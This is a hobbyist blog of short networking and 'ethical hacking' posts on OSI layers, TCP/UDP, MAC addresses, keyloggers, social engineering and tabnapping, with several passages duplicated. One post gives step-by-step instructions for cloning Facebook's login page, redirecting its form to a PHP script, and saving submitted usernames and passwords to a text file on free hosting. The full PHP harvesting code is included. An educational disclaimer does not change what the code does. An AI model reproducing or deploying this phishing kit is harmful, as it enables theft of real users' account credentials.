Google introduced new tool cloud security scanner. If you are a programmer or interested in hacking so this tool help you a lot, web application vulnerability scanner tool . If you are developer you can check your application vulnerability or your risk.
Monday 23 February 2015
Saturday 20 September 2014
Tuesday 8 July 2014
TRANSPORT LAYER PROTCOL
Transport layer is responsible to make a packets and how data is transmitted in tcp environment. Transport layer recieves data from its upper layer and make packets of data and forward it to the network layer it perform flow control, reliability, sequence number or acknowledgements. Transport layer is a L4 layer of OSI Model which make segmentation..
TCP ( Transmission control protocol)
TCP is a connection oriented protocol. It make packets of your data and provide sequencing and give you acknowledgement of your data and error checking or resend your data until its received to the destination.
UDP (User data gram Protocol)
It is a connectionless protocol which is not provide you acknowledgement . Its only send your data to the destination without any acknowledgment. Voice communication are UDP
Sunday 6 July 2014
FACEBOOK ACCOUNT BACKUP
Yes you can take backup of your facebook account like your photos , videos, contact, post and etc just visit on https://register.facebook.com/editaccount.php
just click on that link and download all your data from facebook...
just click on that link and download all your data from facebook...
ETHICAL HACKING
FOOTPRINTING
Foot printing is a first step which hacker has perform before hacking any website or network or accounts. Actually foot printing is a method or technique to gather your information . If hacker wants to hack your computer or account the first step he perform is foot printing first he gather all your information like your Operating system like which operating system you are using , what antivirus you are using or it is updated or not windows is patched or not so all these information first hacker gather before hacking any computer or accounts that's why it is recommended to you never provide your personal information on internet or telephone
Foot printing is a first step which hacker has perform before hacking any website or network or accounts. Actually foot printing is a method or technique to gather your information . If hacker wants to hack your computer or account the first step he perform is foot printing first he gather all your information like your Operating system like which operating system you are using , what antivirus you are using or it is updated or not windows is patched or not so all these information first hacker gather before hacking any computer or accounts that's why it is recommended to you never provide your personal information on internet or telephone
MAC ADDRESS
As i told you in my previous tutorial that every computer or device connected on the network or internet has a unique identification number known as IP addresses same like mac address is also required. Every Computer or laptop have a Physical Identification number which is mac (media access control address) it assigned to network interfaces for communication over the network or internet . Mac address are assigned by the manufacturer of your NIC (Network interface controller) mean when you purchased any computer or laptop from any bran they provide you a mac address or physical address for identification it is a unique number it represent like 08-00-29-00-58-E2, you can check your mac address just open CMD or type ipconfig/all
Saturday 5 July 2014
KEYLOGGER
Key logger is a software or application which has the capability to record every information you type from your keyboard . Hacker installed key logger on your computer without your knowledge and once it installed on your PC it sends all the information which you have typed from your keyboard to the hacker in log file . We can also say its a surveillance tool which record your information without your knowledge . Mostly it installed on your PC when you don't have updated Antivirus or window or you have download free games, movies and files or unknown person email attachment.
NAME OF KEYLOGGERS
Sniper Spy
Andra max Key logger
Refog key logger
RECOMMENDATION :- ALWAYS USED UPDATED ANTIVIRUS OR WINDOWS NEVER DOWNLOAD UNKNOWN PERSON EMAIL ATTACHMENT WITHOUT SCANNING . DOWNLOAD SOFTWARE OR GAMES ONLY FROM TRUSTED WEBSITES
NAME OF KEYLOGGERS
Sniper Spy
Andra max Key logger
Refog key logger
RECOMMENDATION :- ALWAYS USED UPDATED ANTIVIRUS OR WINDOWS NEVER DOWNLOAD UNKNOWN PERSON EMAIL ATTACHMENT WITHOUT SCANNING . DOWNLOAD SOFTWARE OR GAMES ONLY FROM TRUSTED WEBSITES
HOW TO BECOME AN ETHICAL HACKER
Ethical Hacker is a person work with permission of the company or organization to protect the network or application from hackers he help to increase the security . Security is ever evolving process . No network or computer is 100 percent secure.
To become an ethical hacker you required lot of skills in computer programming and networking , ethical hacker needs hands on security skills. Being an ethical hacker its your responsibility to perform penetration testing and check all the security or vulnerabilities in network or in application. Being an ethical hacker you should have the programming knowledge like C, C++, HTML., php. python, sql, although you must have the knowledge in networking like:-
1. Routing knowledge (Routing Protocols)
2.OSI Model , TCP/IP
3.ACL (Access control list)
4.Firewalls, IPS, (Intrusion Preventation system), IDS (Intrusion detection system)
5.Microsoft Server 2008 or 2010
6.Linux or (Backtrack open source)
KNOWLEDGE REQUIRED
Hacker is a very intelligent person who have very good knowledge in all above programming and networking or to become an ethical hacker you must have all the knowledge which i have mention above . We will learn all these thing one by one in our upcoming lecture or tutorials.
To become an ethical hacker you required lot of skills in computer programming and networking , ethical hacker needs hands on security skills. Being an ethical hacker its your responsibility to perform penetration testing and check all the security or vulnerabilities in network or in application. Being an ethical hacker you should have the programming knowledge like C, C++, HTML., php. python, sql, although you must have the knowledge in networking like:-
1. Routing knowledge (Routing Protocols)
2.OSI Model , TCP/IP
3.ACL (Access control list)
4.Firewalls, IPS, (Intrusion Preventation system), IDS (Intrusion detection system)
5.Microsoft Server 2008 or 2010
6.Linux or (Backtrack open source)
KNOWLEDGE REQUIRED
INFORMATION GATHERING
SOCIAL ENGINEERING ATTACK
PHISHING ATTACK
DNS POISONING (ADVANCED PHISHING)
SNIFFERSPHYSICAL ACCESS
SESSION HIJACKING (MAN IN THE MIDDLE ATTACK)
SQL INJECTION
XXS ATTACK
BRUTE FORCING ATTACK (PASSWORD GUESSING)
DOS ATTACK
DDOS ATTACK
WINDOWS HACKING
LINUX HACKING
CRYPTOGRAPHY
WIRELESS HACKING TECHNIQUE (WEP OR WAP CRACK TOOLS)
TROJANS AND BACKDOORS
PROXY SERVER AND ETC...
Hacker is a very intelligent person who have very good knowledge in all above programming and networking or to become an ethical hacker you must have all the knowledge which i have mention above . We will learn all these thing one by one in our upcoming lecture or tutorials.
SOCIAL ENGINNERING
Social engineering is a method or technique to get into the network or a system. Social engineering is used to obtain your personal information like your name date of birth bank account details and email accounts details or your network details etc. Social engineering commonly done by the telephone or internet to get the sensitive information or to get them to do something which is against the security policies of company or organization. In social engineering attack you get the telephone call or email where your personal information ask or if you provide your information on telephone or internet you will get the victim.
NEVER RESPOND TO ANY PHONE CALL OR EMAIL WHERE YOUR PERSONAL INFORMATION ASK. ALWAYS VERIFY THE WEBSITE BEFORE ENTERING YOUR PERSONAL INFORMATION
For more details on social engineering watch my video tutorial
NEVER RESPOND TO ANY PHONE CALL OR EMAIL WHERE YOUR PERSONAL INFORMATION ASK. ALWAYS VERIFY THE WEBSITE BEFORE ENTERING YOUR PERSONAL INFORMATION
For more details on social engineering watch my video tutorial
Friday 4 July 2014
TAB NAPPING
Tab napping is a new advanced method of phishing it is also used to steal your personal information like username and passwords, bank details or password and etc. Tab napping is done when you have multiples tab open like you are watching videos on you tube or chatting on Facebook and booking tickets etc, its something script which you enter into your web site or blog and when the victim visit on your website or blog or click on your link now when you go to the other tab You will be redirect to the phishing page which hacker has created and it will ask you to enter the user name and password like you were chatting on the Facebook and also watching videos on you tube now you will be redirect again to Facebook page and it will ask you to enter your username and password again and when you enter your user name and password hacker will get all your information because it was a phishing page.
DO NOT CLICK ANY LINK BEFORE VERIFYING IT OR DO NOT OPEN MULTIPLE TABS WHILE ENTERING YOUR BANK DETAILS OR INTERNET SHOPPING.
DO NOT CLICK ANY LINK BEFORE VERIFYING IT OR DO NOT OPEN MULTIPLE TABS WHILE ENTERING YOUR BANK DETAILS OR INTERNET SHOPPING.
HIJACT RACT ANDROID MALWARE
HIJACK RACT ia new android malware which comprise accounts of mobile banking users
It can give remote control of the infected device to hackers. It can steal your personal information like SMS or messages and also read your contacts , scans for legitimate banking apps installed on the victim’s mobile phone and replace them with fakes utilities it can disable any mobile security software or antivirus solution that might be installed on a compromised Android device.
PREVENTION :- NEVER DOWNLOAD MOBILE APPS FROM ANY WEBSITES ONLY FROM TRUSTED WEBSITE LIKE GOOGLE PLAY STORE ALWAYS READ ITS INSTRUCTION OR AGREEMENT BEFORE INSTALLING THE APPLICATION.
For daily updated on hacking or computer subscribe our blog
HOW HACKERS HACK USING PHIHING ATTACK
THIS VIDEO IS ONLY FOR EDUCATIONAL PURPOSES FREE IT EDUCATION WORLD IS NOT MOTIVATING YOU OR ENCOURAGING YOU FOR HACKING . HACKING IS ILLEGAL OR CRIME .
How hackers create a phishing page ?
1. First You need a a web hosting account where you can upload all you files . You can upload your files on a free webhosting account you can create a free web hosting account like my2gb.com or byethost.com or etc.
2. After creating a web hosting account now you need a phishing page or PHP file to create a fake page of the website you just open that website like if you want to create a fake page of facebook just open the facebook website and right click on the website or click on "view page source" option now you will see all the source code you can see in picture below
Now you can search for action="https://www.facebook.com/login.php
Now Change it to action="facebook.php and save the file with name as facebook.htm
3 Nor you need php code just copy the code and save in into note pad as facebook.php
<?php
header (‘https://www.facebook.com’);
$handle = fopen(“facebook.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Copy the above code and paste it into notepad and save it as facebook.php
Now everything is done you have successfully link your code with facebook page now upload both the files facebook.php and facebook.htm on your web hosting account.
TO DETECT THE PHISHING PAGE OR PHISHING WEBSITE YOU CAN GO TO HTTP://WWW.PHISHTANK.COM
FORE MORE DETAILS ON PHISHING YOU CAN WATCH MY VIDEO TUTORIAL HOW HACKERS HACK YOUR EMAIL ACCOUNT WITH PHISHING
http://www.freeiteducationworld.blogspot.in/2014/05/how-to-hack-facebook-account-part-1_6.html
TO DETECT THE PHISHING PAGE OR PHISHING WEBSITE YOU CAN GO TO HTTP://WWW.PHISHTANK.COM
FORE MORE DETAILS ON PHISHING YOU CAN WATCH MY VIDEO TUTORIAL HOW HACKERS HACK YOUR EMAIL ACCOUNT WITH PHISHING
http://www.freeiteducationworld.blogspot.in/2014/05/how-to-hack-facebook-account-part-1_6.html
Tuesday 1 July 2014
OSI MODEL
Open System Interconnection (OSI) Model was Introduced in 1984. It has seven Layer which help computer to communicate with other computer over the Network. Its read from Top to bottom
7. Application Layer : It is responsible for message formatting like when we open internet explore we work on application layer
6. Presentation Layer:- It help to decrypt or encrypt the message or compression, decompression
5. Session Layer : It allows authentication or permission to make session restoration
4.Transport Layer:- End-to End Control error or make divide data into packets.
3.Network Layer :- It allows network addressing, ip addressing or routing , forward packets.
2.Data Link Layer : It detects error or flow control on physical link
1. Physical Layer : Physical medium (cable or Lan card) method of representing bit, like hubs, or physical cable.
7. Application Layer : It is responsible for message formatting like when we open internet explore we work on application layer
6. Presentation Layer:- It help to decrypt or encrypt the message or compression, decompression
5. Session Layer : It allows authentication or permission to make session restoration
4.Transport Layer:- End-to End Control error or make divide data into packets.
3.Network Layer :- It allows network addressing, ip addressing or routing , forward packets.
2.Data Link Layer : It detects error or flow control on physical link
1. Physical Layer : Physical medium (cable or Lan card) method of representing bit, like hubs, or physical cable.
HOW TO RECOVER DELTE DATA FROM HARD DRIVE
When you delete you hard drive data or format your hard drive your data has not deleted permanently you can recover your HD Data with easily. There are lot of software available in the market which can recover your data and Stellar Phoenix Windows Data Recovery Tool is the best tool to recover your HD Data . You can buy Sellar Phoenix Windows Data Recovery Tool
Stellar Phoenix Data recover
Stellar Phoenix Data recover
INCREASE INTERNET SPEED BY USING FIREFOX
If you are using Firefox browser so you can increase it speed by manually just type about:config in the address bar where you enter the website.
Subscribe to:
Posts (Atom)